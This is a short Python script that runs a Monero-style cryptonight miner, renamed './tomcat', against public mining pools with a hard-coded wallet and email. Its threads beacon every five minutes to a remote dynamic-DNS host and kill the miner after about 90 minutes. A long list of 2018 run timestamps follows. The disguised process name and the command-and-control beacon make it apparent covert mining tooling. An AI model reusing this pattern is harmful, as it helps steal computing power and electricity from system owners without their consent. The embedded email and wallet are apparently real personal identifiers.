import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:01.452053
#2018-02-17 15:58:05.641673
#2018-02-17 17:45:07.186778
#2018-02-17 19:33:04.857515
#2018-02-17 21:22:06.911216
#2018-02-17 23:06:04.227374
#2018-02-18 00:53:05.939693
#2018-02-18 02:41:06.222942
#2018-02-18 04:29:01.885121
#2018-02-18 06:21:06.828408
#2018-02-18 08:10:06.155334
#2018-02-18 09:57:06.640103
#2018-02-18 11:44:03.979815
#2018-02-18 13:28:07.255243
#2018-02-18 15:18:01.840638
#2018-02-18 17:07:07.388745
#2018-02-18 18:54:04.332425
#2018-02-18 20:41:06.953380
#2018-02-18 22:26:05.729507
#2018-02-19 00:15:04.373818
#2018-02-19 02:01:04.037505
#2018-02-19 03:48:06.483305
#2018-02-19 05:32:01.320832
#2018-02-19 07:20:06.592522
#2018-02-19 09:09:03.853925
#2018-02-19 10:59:05.981801
#2018-02-19 12:46:04.280910
#2018-02-19 14:33:01.873353
#2018-02-19 16:20:11.556784
#2018-02-19 18:07:05.195959
#2018-02-19 19:54:08.475466
#2018-02-19 21:41:05.767347
#2018-02-19 23:29:05.039125
#2018-02-20 01:16:03.742493
#2018-02-20 03:07:04.042180
#2018-02-20 04:54:03.784105
#2018-02-20 06:37:04.573150
#2018-02-20 08:22:03.913976
#2018-02-20 10:07:05.416390
#2018-02-20 11:51:07.295832
#2018-02-20 13:39:04.882847
#2018-02-20 15:22:03.870075
#2018-02-20 17:08:01.391601
#2018-02-20 18:58:09.344124
#2018-02-20 20:47:04.187511
#2018-02-20 22:32:06.448066
#2018-02-21 00:13:03.719485
#2018-02-21 02:01:05.187209
#2018-02-21 03:49:05.669951
#2018-02-21 05:38:07.309158
#2018-02-21 07:28:06.811570
#2018-02-21 09:13:06.372911
#2018-02-21 11:02:09.250516
#2018-02-21 12:48:07.675820
#2018-02-21 14:36:08.103304
#2018-02-21 16:24:09.268749
#2018-02-21 18:15:07.450868
#2018-02-21 20:01:19.396991
#2018-02-21 21:50:07.097034
#2018-02-21 23:36:01.394819
#2018-02-22 01:24:02.166247
#2018-02-22 03:14:04.876589
#2018-02-22 04:59:05.225476
#2018-02-22 06:42:06.440523
#2018-02-22 08:31:01.502324
#2018-02-22 10:19:08.886429
#2018-02-22 12:04:04.807500
#2018-02-22 13:50:06.898548
#2018-02-22 15:40:01.814173
#2018-02-22 17:26:08.699670
#2018-02-22 19:14:07.944818
#2018-02-22 21:07:06.881097
#2018-02-22 22:52:02.215198
#2018-02-23 00:39:07.463182
#2018-02-23 02:25:06.083282
#2018-02-23 04:15:09.148787
#2018-02-23 06:01:07.266447
#2018-02-23 07:47:03.722077
#2018-02-23 09:48:07.998247
#2018-02-23 11:48:09.400718
#2018-02-23 13:38:06.739467
#2018-02-23 15:26:07.160474
#2018-02-23 17:16:07.247311
#2018-02-23 19:01:19.636292
#2018-02-23 20:49:07.359399
#2018-02-23 22:38:08.069556
#2018-02-24 00:27:02.118839
#2018-02-24 02:18:04.018973
#2018-02-24 04:08:04.406653
#2018-02-24 05:56:02.165718
#2018-02-24 07:44:09.911678
#2018-02-24 09:31:01.571198
#2018-02-24 11:24:03.749932
#2018-02-24 13:13:03.632568
#2018-02-24 15:03:05.939213
#2018-02-24 16:52:07.305345
#2018-02-24 18:40:01.571719
#2018-02-24 20:31:03.524733
#2018-02-24 22:30:04.462244
#2018-02-25 01:40:01.681893
#2018-02-25 05:21:06.976997
#2018-02-25 11:34:01.786639